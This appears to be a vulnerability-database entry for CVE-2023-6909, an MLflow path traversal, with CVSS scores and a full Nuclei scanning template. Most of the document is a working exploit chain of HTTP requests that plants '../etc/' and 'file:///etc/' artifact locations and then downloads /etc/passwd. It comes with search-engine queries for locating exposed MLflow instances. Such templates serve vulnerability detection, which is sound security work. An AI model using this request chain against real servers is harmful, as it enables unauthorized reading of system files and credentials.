Mlflow <2.9.2 - Path Traversal

2024-02-0210:20:55

ProjectDiscovery

github.com

path traversal

github

mlflow

sensitive information

ssh keys

internal configurations

update vulnerability

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.005 Low

EPSS

Percentile

76.3%

JSON

Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

id: CVE-2023-6909

info:
  name: Mlflow <2.9.2 - Path Traversal
  author: Hyunsoo-ds
  severity: high
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
  impact: |
    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
  remediation: |
    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
  reference:
    - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6909
    cwe-id: CWE-29
    epss-score: 0.00494
    epss-percentile: 0.76167
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"}

      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_5
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4a0a00473045022100db5504fc5ccec8cb533fd47b571ed5f305ea8139bb810af6027e28961ced040f02206640d8721c739138031e655a2f394b7ceda41c462823e52e45cf0ba23b260200:922c64590222798bb761d5b6d8e72950